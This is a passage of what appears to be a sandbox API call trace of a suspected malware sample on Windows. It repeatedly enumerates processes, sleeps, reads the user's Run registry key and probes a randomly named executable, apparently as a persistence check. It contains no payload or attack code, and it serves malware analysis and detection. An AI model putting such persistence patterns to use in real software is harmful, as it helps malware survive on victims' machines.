(x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0300.740] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0300.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0300.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0300.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0300.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0300.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0300.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0300.891] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0300.893] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0300.894] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0300.894] NtClose (Handle=0x338) returned 0x0 [0300.894] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0300.894] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0300.894] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0300.894] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0300.894] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0300.894] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0300.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0300.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0300.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0300.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0300.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0301.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0301.032] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0301.034] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0301.035] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0301.035] NtClose (Handle=0x338) returned 0x0 [0301.036] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0301.036] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0301.036] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0301.036] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0301.036] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0301.036] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0301.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0301.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0301.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0301.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0301.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0301.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0301.179] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0301.181] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0301.182] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0301.182] NtClose (Handle=0x338) returned 0x0 [0301.182] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0301.183] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0301.183] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de1a0) returned 1 [0301.183] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0301.183] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0301.183] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0301.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0301.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0301.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0301.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0301.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0301.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0301.332] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0301.334] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0301.335] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0301.335] NtClose (Handle=0x338) returned 0x0 [0301.335] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0301.335] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0301.335] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0301.335] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0301.335] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0301.336] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0301.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0301.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0301.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0301.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0301.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0301.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0301.564] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0301.566] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0301.568] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0301.568] NtClose (Handle=0x338) returned 0x0 [0301.568] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0301.568] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0301.568] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0301.568] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0301.568] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0301.569] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de420) returned 1 [0301.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0301.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0301.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0301.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0301.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0301.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0301.685] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0301.686] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0301.687] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0301.687] NtClose (Handle=0x338) returned 0x0 [0301.687] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0301.687] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0301.687] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0301.687] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0301.687] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0301.687] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0301.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0301.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0301.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0301.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0301.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0301.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0301.827] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0301.828] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0301.829] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, 